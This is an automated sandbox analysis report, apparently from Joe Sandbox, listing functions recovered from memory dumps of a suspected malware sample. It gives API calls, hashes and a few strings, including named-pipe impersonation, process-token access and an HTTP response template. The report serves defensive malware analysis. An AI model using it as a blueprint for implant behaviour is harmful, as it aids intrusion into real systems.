                Function 0067E98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$OpenProcessToken
                • String ID:
                • API String ID: 2009710997-0
                • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                • Instruction ID: be70d9a1b9824e6d91bdd001a0645cfd12320119953c9e94c73a6e9c154cd505
                • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                • Instruction Fuzzy Hash: 0C21C425304B0186EB54AF62E46475A67A3FBC8BA4F14803CAE4E43B15DF3EC44ACB84
                Function 001BF210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001BF236
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001BF242
                • __crtIsPackagedApp.LIBCMT ref: 001BF253
                • _dosmaperr.LIBCMT ref: 001BF29D
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2917016420-0
                • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                • Instruction ID: 3ed8b6cf709debf8d3d5eb5d30d3862baa036c4a4594f282fce4260f8f547789
                • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                • Instruction Fuzzy Hash: 0821CF36300B4096EB14AF76AC153ADB7E1FBA9BA4F184639EE49437A5DF3CC4428700
                Function 001CEFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001CF01F
                • _invalid_parameter_noinfo.LIBCMT ref: 001CF02A
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                • Instruction ID: 0ce4bd91c6ac52b6e23cc360a9f001d43c82dac6a01da28f891c7d467d7c2d83
                • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                • Instruction Fuzzy Hash: 45218B722047848AD7109F52D485F69B7A6F7A9FE0F69823DEF5807B46CB34C856CB00
                Function 0068FBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068FC1F
                • _invalid_parameter_noinfo.LIBCMT ref: 0068FC2A
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                • Instruction ID: d3b0a8c39b02e232e219af6ac56bdc75e73b4ff08cdd2bd878a79b47920382d2
                • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                • Instruction Fuzzy Hash: 482183723047888AD761AF11D48469EB7A6FB95BE0F684335EF5817B55CB34CA82C700
                Function 0067596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTickioctlsocket
                • String ID:
                • API String ID: 3686034022-0
                • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                • Instruction ID: bbe50e0202cb6f6ad8ee280aec3c1a58fbc916d8ae08fde82de85a24ae74b9b2
                • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                • Instruction Fuzzy Hash: 94112932704EC197E7108B69E8543597322E784BB4F504220DB4E86EA0DFBDCC99CB50
                Function 00670AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                • String ID:
                • API String ID: 4232080776-0
                • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                • Instruction ID: b18c62b105e39fa9bd382888b4b7a9ba732a94301dd04494ffbb538dad6fbaa7
                • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                • Instruction Fuzzy Hash: 7311E331710642C6F750AB25EC647AA3327FBC4B44F848116890E82E60DF3EC568CB62
                Function 001BFF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                • Instruction ID: c862a0ed6b8f5ce2fa69b836523f6c9ead2efe547d3ca5b4723f08b5149bf0ef
                • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                • Instruction Fuzzy Hash: 07512C32704350C69B198A665900BBAB691B769BF4F19872DFF7943FD5CB38C4A28740
                Function 00680B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                • Instruction ID: 482e37c5ac51eca48aac66d78720c05e2b5d2f6479f3cc17f4d53c8a761545bf
                • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                • Instruction Fuzzy Hash: AF51603170475086FB98BE6695005AAB693F755FF8F148F24AE3947FD4CB38D49A8340
                Function 001B1030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001B1063
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                  • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                • free.LIBCMT ref: 001B115E
                • free.LIBCMT ref: 001B116B
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$freemalloc$_callnewh
                • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                • API String ID: 2029259483-317027030
                • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                • Instruction ID: c88a008fba11b0880876a59c021beeebc6c3bd86dbfa66db4d61d791c2e2c4ff
                • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                • Instruction Fuzzy Hash: 4651C072708790A6DB10DF66E4503EEB7A2F399B94F404016EE8A47B58EF7CC609CB40
                Function 0068A348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _mtinitlocknum.LIBCMT ref: 0068A375
                  • Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
                  • Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F
                • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
                • EnterCriticalSection.KERNEL32 ref: 0068A414
                • LeaveCriticalSection.KERNEL32 ref: 0068A424
                • _calloc_crt.LIBCMT ref: 0068A49A
                • __lock_fhandle.LIBCMT ref: 0068A502
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 445582508-0
                • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                • Instruction ID: 4914a5b9f05a24cbee6919df2c3318ca5fba6cc4527ed45511ea0f3f6cba0893
                • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                • Instruction Fuzzy Hash: 0E51F33260078082EF20EF54D45436DB7ABFB94B58F19471ADE4E477A0DBB8C956C702
                Function 00671694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                  • Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
                  • Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582
                • fseek.LIBCMT ref: 00671730
                  • Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
                  • Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7
                • _ftelli64.LIBCMT ref: 00671738
                  • Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
                  • Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41
                • fseek.LIBCMT ref: 00671748
                  • Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5
                • GetFullPathNameA.KERNEL32 ref: 0067176B
                • malloc.LIBCMT ref: 00671788
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                  • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                • fclose.LIBCMT ref: 00671845
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                • String ID:
                • API String ID: 3587854850-0
                • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                • Instruction ID: 7ab80978dd0f55085e882ccbcc8fdfab77c345480eb8815360099638d3a819f6
                • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                • Instruction Fuzzy Hash: CB41F52271468082DB84EB26E41576E6353F7C9BD0F90C22AEE5E4BB96DF3DC506CB05
                Function 00675C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetACP.KERNEL32 ref: 00675C78
                • GetOEMCP.KERNEL32 ref: 00675C82
                • GetCurrentProcessId.KERNEL32 ref: 00675CA8
                • GetTickCount.KERNEL32 ref: 00675CB0
                  • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                • GetCurrentProcess.KERNEL32 ref: 00675CEC
                  • Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
                  • Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89
                • GetCurrentProcessId.KERNEL32 ref: 00675D5E
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                • String ID:
                • API String ID: 3426420785-0
                • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                • Instruction ID: a31f047bb2689254cef874948690ad23f5f662dbf2868a21ec4335529d286551
                • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                • Instruction Fuzzy Hash: EB410662710611A5FF40EBB1DC6579D33ABBF89784F40441AEE0D87A69EF3AC10AC758
                Function 00676F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 00676F5E
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • htonl.WS2_32 ref: 00676F91
                • recvfrom.WS2_32 ref: 00676FD5
                • WSAGetLastError.WS2_32 ref: 00676FE2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                • String ID:
                • API String ID: 2310505145-0
                • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                • Instruction ID: dacedd6afec655f8603582c3147e2722dd160d8df43d601f604d9943b79852a0
                • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                • Instruction Fuzzy Hash: 5A41C272304B80C2EB10DF25E85476A77A3F799BA8F148225EA8D47B68DF39C491CF41
                Function 006779C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                • String ID:
                • API String ID: 1014270282-0
                • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                • Instruction ID: 76af5c70d6d55f15a5d3e694d8c45974960cfc59736c55926a841bf454df5036
                • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                • Instruction Fuzzy Hash: 9B319E3221878486EB20CF52D40439977A6F789FD8F088229EE4D47B58DF7DC605CB04
                Function 001BFA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                • Instruction ID: d79c40bf3918c9fa484927681f85c025c9643a4f9237e60832a0d1a35a135649
                • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                • Instruction Fuzzy Hash: 90112B3130478691DB155F72AC0179EA691BBA9BC4F48443DFE8997B15EF3CC4528700
                Function 00680620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                • String ID:
                • API String ID: 1547050394-0
                • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                • Instruction ID: a40d540d47b088048bfe16391e653f490ec8f920807c678a62003acf545fab94
                • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                • Instruction Fuzzy Hash: BA112B6131478286FBD1BF22A90131EA7A7BF45BC0F448B25AE8997B15EF3CC4518B15
                Function 001C9B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2102446242-0
                • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                • Instruction ID: dd29af7a0bbcfb0f8c885d72607cb4f9eedecfcd2488692b8e97fb2a43453b91
                • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                • Instruction Fuzzy Hash: 9C11E632300681A5DB056FA9E8D9FBD7654ABB1760F59412DEA160B392CB78CC41C314
                Function 0066FC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0066FC85
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • free.LIBCMT ref: 0066FCC0
                • fwrite.LIBCMT ref: 0066FD01
                • fclose.LIBCMT ref: 0066FD09
                • free.LIBCMT ref: 0066FD16
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • GetLastError.KERNEL32 ref: 0066FD1B
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1616846154-0
                • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                • Instruction ID: 7beae5d72eb1f2fed228a9ffe6e69fda94c884abe9a2695e6ca6c291c5bb6aa4
                • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                • Instruction Fuzzy Hash: A011C851304B4041DA50F762F05126E5353AB85FE4F448639FF6D47B8AEE3DC6058784
                Function 00674488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                • String ID:
                • API String ID: 3798860377-0
                • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                • Instruction ID: a5eaa13596bb6ba13a5b20f1861f8e719e20c87dd55486891cc02f8470e61110
                • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                • Instruction Fuzzy Hash: F411C13270465183FB109B25F52872A63A6F784BA8F408215DB5E47F98CF7DC4668B41
                Function 001BE3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001BE40F
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001BE41D
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • malloc.LIBCMT ref: 001BE43F
                • _snprintf.LIBCMT ref: 001BE45A
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • malloc.LIBCMT ref: 001BE475
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                • String ID: dpoolWait
                • API String ID: 2026495703-1875951006
                • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                • Instruction ID: 6bb0191720dd6e5e514b52e385db50caed7c4f5a737b4c4f143b590beaf4cb2e
                • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                • Instruction Fuzzy Hash: 0301DEB1700B9081DA04DB52B844799B7D9F7B8FE0F05822AEFA947BC5CF78C0418780
                Function 0067EFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0067F00F
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 0067F01D
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • malloc.LIBCMT ref: 0067F03F
                • _snprintf.LIBCMT ref: 0067F05A
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • malloc.LIBCMT ref: 0067F075
                Strings
                • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                • API String ID: 3518644649-2739389480
                • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                • Instruction ID: e4aaa5cf7ec710a51765eb7b204984538c75f910b742846cdf55e64eaa3db872
                • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                • Instruction Fuzzy Hash: 8B01D231705B9046DA84DB92B804B19769AF78CFE0F04822DEFAD47BC6DF38C1418780
                Function 001B25F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: freemallocstrchr$rand
                • String ID:
                • API String ID: 1305919620-0
                • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                • Instruction ID: 4621b4367b0e2598b79348c7eaca8d736ce7e3cd8140e4c037f313f146006020
                • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
